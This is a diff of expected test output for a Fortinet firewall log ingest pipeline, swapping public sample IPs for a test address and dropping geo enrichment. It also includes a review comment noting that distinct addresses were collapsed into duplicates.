srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", "code": "0316013056", "timezone": "-0500", "kind": "event", 
@@ -121,24 +106,9 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 161, "bytes": 0, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "policy", @@ -183,7 +153,7 @@ "related": { "ip": [ "10.10.10.10", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -205,8 +175,8 @@ }, "event": { "duration": 0, - "ingested": "2021-06-29T09:32:55.133579400Z", - "original": "\u003c189\u003edate=2020-04-23 time=01:16:08 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"OPERATIONAL\" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf=\"srcintfname\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=161 dstintf=\"dstintfname\" dstintfrole=\"lan\" sessionid=155313 proto=17 action=\"deny\" policyid=0 policytype=\"policy\" service=\"SNMP\" dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=\"noop\" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat=\"unscanned\" crscore=30 craction=131072 crlevel=\"high\"", + "ingested": "2021-12-09T13:37:22.357751700Z", + "original": "\u003c189\u003edate=2020-04-23 time=01:16:08 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"OPERATIONAL\" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf=\"srcintfname\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=161 dstintf=\"dstintfname\" dstintfrole=\"lan\" sessionid=155313 proto=17 action=\"deny\" policyid=0 policytype=\"policy\" service=\"SNMP\" dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=\"noop\" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat=\"unscanned\" crscore=30 craction=131072 crlevel=\"high\"", "code": "0000000013", "kind": "event", "start": "2020-06-24T01:16:08.000Z", @@ -226,24 +196,9 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, "bytes": 6812, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", 
@@ -302,7 +257,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -321,8 +276,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133587Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:45 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0317013312\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" eventtime=1587230266314799756 tz=\"-0500\" policyid=38 sessionid=543234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=65236 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"passthrough\" reqtype=\"direct\" url=\"/\" sentbyte=3545 rcvdbyte=6812 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=23 catdesc=\"Web-based Email\"", + "ingested": "2021-12-09T13:37:22.357757Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:45 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0317013312\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" eventtime=1587230266314799756 tz=\"-0500\" policyid=38 sessionid=543234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=65236 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"passthrough\" reqtype=\"direct\" url=\"/\" sentbyte=3545 rcvdbyte=6812 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=23 catdesc=\"Web-based Email\"", "code": "0317013312", "timezone": "-0500", "kind": "event", 
@@ -342,23 +297,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -416,7 +356,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -444,8 +384,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133594300Z", - "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230255061492894 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", + "ingested": "2021-12-09T13:37:22.357762600Z", + "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230255061492894 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", "code": "1059028704", "timezone": "-0400", "kind": "event", 
@@ -465,23 +405,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -539,7 +464,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -567,8 +492,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133601600Z", - "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1591788391 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=8.8.8.8 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", + "ingested": "2021-12-09T13:37:22.357767800Z", + "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1591788391 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", "code": "1059028704", "timezone": "-0400", "kind": "event", 
@@ -588,23 +513,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -613,7 +523,7 @@ "class": "IN" }, "resolved_ip": [ - "8.8.8.8" + "67.43.156.13" ], "id": "2234" }, @@ -660,7 +570,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -677,8 +587,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133608700Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"8.8.8.8\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", + "ingested": "2021-12-09T13:37:22.357773900Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", "code": "1501054802", "timezone": "-0500", "kind": "event", @@ -699,23 +609,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -724,8 +619,8 @@ "class": "IN" }, "resolved_ip": [ - "8.8.8.8", - "8.8.4.4" + "67.43.156.13", + "67.43.156.13" ], "id": "2234" }, 
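Review bot: The two distinct resolved addresses of the second dns-response event are both mapped to `67.43.156.13`, so `dns.resolved_ip` now holds a duplicate and `related.ip` in the next hunk (@@ -772) shrinks to one entry; the multi-address `ipaddr` path is no longer distinguishable from the single-address case in the expected output. The same collapse happens in the IPsec hunks at @@ -1305 and @@ -1400, where `remip` and `locip` become the same address and `related.ip` loses its second element, while the hunk at @@ -1620 shows the intended shape with `67.43.156.13` and `67.43.156.14` kept distinct. Using a second address from the supported range here, `"resolved_ip": ["67.43.156.13", "67.43.156.14"]`, with the matching `ipaddr` change in the input log, preserves that coverage. The input change belongs to test-fortinet.log, whose hunk starts outside this view.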
@@ -772,8 +667,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8", - "8.8.4.4" + "67.43.156.13" ] }, "fortinet": { @@ -790,8 +684,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133616Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"8.8.8.8, 8.8.4.4\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", + "ingested": "2021-12-09T13:37:22.357778600Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13, 67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", "code": "1501054802", "timezone": "-0500", "kind": "event", @@ -812,23 +706,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", 
@@ -886,7 +765,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { @@ -905,8 +784,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133623500Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:17:11 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230232148674303 tz=\"-0500\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=8.8.8.8 srcport=63012 dstport=443 srcintf=\"port1\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=100602 sessionid=543234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.no\" incidentserialno=54323 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\"", + "ingested": "2021-12-09T13:37:22.357783Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:17:11 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230232148674303 tz=\"-0500\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf=\"port1\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=100602 sessionid=543234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.no\" incidentserialno=54323 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\"", "code": "1059028704", "timezone": "-0500", "kind": "event", 
@@ -926,23 +805,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -951,7 +815,7 @@ "class": "IN" }, "resolved_ip": [ - "8.8.8.8" + "67.43.156.13" ], "id": "2352" }, @@ -998,7 +862,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -1015,8 +879,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133630600Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:17:04 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230224712900694 tz=\"-0500\" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=2352 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"8.8.8.8\" msg=\"Domain is monitored\" action=\"pass\" cat=93 catdesc=\"Remote Access\"", + "ingested": "2021-12-09T13:37:22.357787800Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:17:04 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230224712900694 tz=\"-0500\" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=2352 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=93 catdesc=\"Remote Access\"", "code": "1501054802", "timezone": "-0500", "kind": "event", @@ -1037,23 +901,8 @@ "level": "information" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 53, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "dns": { "question": { @@ -1104,7 +953,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
@@ -1119,8 +968,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133637700Z", - "original": "\u003c190\u003edate=2020-04-23 time=12:17:12 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1500054000\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-query\" level=\"information\" vd=\"root\" eventtime=1587230232658642672 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=235 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\"", + "ingested": "2021-12-09T13:37:22.357794Z", + "original": "\u003c190\u003edate=2020-04-23 time=12:17:12 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1500054000\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-query\" level=\"information\" vd=\"root\" eventtime=1587230232658642672 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"elastictest\" xid=235 qname=\"elastic.co\" qtype=\"A\" qtypeval=1 qclass=\"IN\"", "code": "1500054000", "timezone": "-0500", "kind": "event", @@ -1139,23 +988,8 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, - "ip": "8.8.4.4" + "ip": "67.43.156.13" }, "rule": { "ruleset": "somecerts", @@ -1206,7 +1040,7 @@ ], "ip": [ "192.168.2.1", - "8.8.4.4" + "67.43.156.13" ] }, "fortinet": { 
@@ -1222,8 +1056,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133645Z", - "original": "\u003c189\u003edate=2020-04-23 time=13:15:18 devname=\"testswitch2\" devid=\"someotherid\" logid=\"1700062001\" type=\"utm\" subtype=\"ssl\" eventtype=\"ssl-anomalies\" level=\"notice\" vd=\"root\" eventtime=1587230118838592454 tz=\"-0400\" policyid=12 sessionid=42346234 service=\"HTTPS\" user=\"elasticuser2\" group=\"elasticgroup2\" profile=\"somecerts\" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 action=\"passthrough\" msg=\"Server certificate passed\" reason=\"untrusted-cert\"", + "ingested": "2021-12-09T13:37:22.357800Z", + "original": "\u003c189\u003edate=2020-04-23 time=13:15:18 devname=\"testswitch2\" devid=\"someotherid\" logid=\"1700062001\" type=\"utm\" subtype=\"ssl\" eventtype=\"ssl-anomalies\" level=\"notice\" vd=\"root\" eventtime=1587230118838592454 tz=\"-0400\" policyid=12 sessionid=42346234 service=\"HTTPS\" user=\"elasticuser2\" group=\"elasticgroup2\" profile=\"somecerts\" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 action=\"passthrough\" msg=\"Server certificate passed\" reason=\"untrusted-cert\"", "code": "1700062001", "timezone": "-0400", "kind": "event", 
@@ -1284,7 +1118,7 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133652500Z", + "ingested": "2021-12-09T13:37:22.357806500Z", "original": "\u003c189\u003edate=2020-04-23 time=12:32:48 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0102043014\" type=\"event\" subtype=\"user\" level=\"notice\" vd=\"root\" eventtime=1587231168439640874 tz=\"-0500\" logdesc=\"FSSO logon authentication status\" srcip=10.10.10.10 user=\"elasticouser\" server=\"elasticserver\" action=\"FSSO-logon\" msg=\"FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10\"", "code": "0102043014", "timezone": "-0500", @@ -1305,45 +1139,15 @@ "level": "error" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 500, - "ip": "8.8.4.4" + "ip": "67.43.156.13" }, "rule": { "description": "IPsec phase 1 error" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 500, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "message": "IPsec phase 1 error", "tags": [ @@ -1362,8 +1166,7 @@ }, "related": { "ip": [ - "8.8.8.8", - "8.8.4.4" + "67.43.156.13" ] }, "fortinet": { 
@@ -1380,8 +1183,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133659900Z", - "original": "\u003c187\u003edate=2020-04-23 time=12:32:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037124\" type=\"event\" subtype=\"vpn\" level=\"error\" vd=\"root\" eventtime=1587231168339114138 tz=\"-0500\" logdesc=\"IPsec phase 1 error\" msg=\"IPsec phase 1 error\" action=\"negotiate\" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf=\"wan2\" cookies=\"345hkjhdrs87/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"N/A\" status=\"negotiate_error\" reason=\"peer SA proposal not match local policy\" peer_notif=\"NOT-APPLICABLE\"", + "ingested": "2021-12-09T13:37:22.357812600Z", + "original": "\u003c187\u003edate=2020-04-23 time=12:32:47 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037124\" type=\"event\" subtype=\"vpn\" level=\"error\" vd=\"root\" eventtime=1587231168339114138 tz=\"-0500\" logdesc=\"IPsec phase 1 error\" msg=\"IPsec phase 1 error\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan2\" cookies=\"345hkjhdrs87/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"N/A\" status=\"negotiate_error\" reason=\"peer SA proposal not match local policy\" peer_notif=\"NOT-APPLICABLE\"", "code": "0101037124", "timezone": "-0500", "kind": "event", 
@@ -1400,45 +1203,15 @@ "level": "notice" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 3356, - "organization": { - "name": "Level 3 Parent, LLC" - } - }, "port": 500, - "ip": "8.4.5.4" + "ip": "67.43.156.13" }, "rule": { "description": "Progress IPsec phase 1" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "France", - "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" - }, - "as": { - "number": 19281, - "organization": { - "name": "Quad9" - } - }, "port": 500, - "ip": "9.9.9.9" + "ip": "67.43.156.13" }, "message": "progress IPsec phase 1", "tags": [ @@ -1460,8 +1233,7 @@ }, "related": { "ip": [ - "9.9.9.9", - "8.4.5.4" + "67.43.156.13" ] }, "fortinet": { 
@@ -1482,8 +1254,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133667100Z", - "original": "\u003c189\u003edate=2020-04-23 time=12:32:31 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231151628960857 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf=\"wan1\" cookies=\"df868dsg876d/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"elasticvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", + "ingested": "2021-12-09T13:37:22.357818800Z", + "original": "\u003c189\u003edate=2020-04-23 time=12:32:31 devname=\"testswitch3\" devid=\"someotherrouteridagain\" logid=\"0101037127\" type=\"event\" subtype=\"vpn\" level=\"notice\" vd=\"root\" eventtime=1587231151628960857 tz=\"-0500\" logdesc=\"Progress IPsec phase 1\" msg=\"progress IPsec phase 1\" action=\"negotiate\" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf=\"wan1\" cookies=\"df868dsg876d/0000000000000000\" user=\"N/A\" group=\"N/A\" xauthuser=\"N/A\" xauthgroup=\"N/A\" assignip=N/A vpntunnel=\"elasticvpn\" status=\"success\" init=\"local\" mode=\"main\" dir=\"outbound\" stage=1 role=\"initiator\" result=\"OK\"", "code": "0101037127", "timezone": "-0500", "kind": "event", 
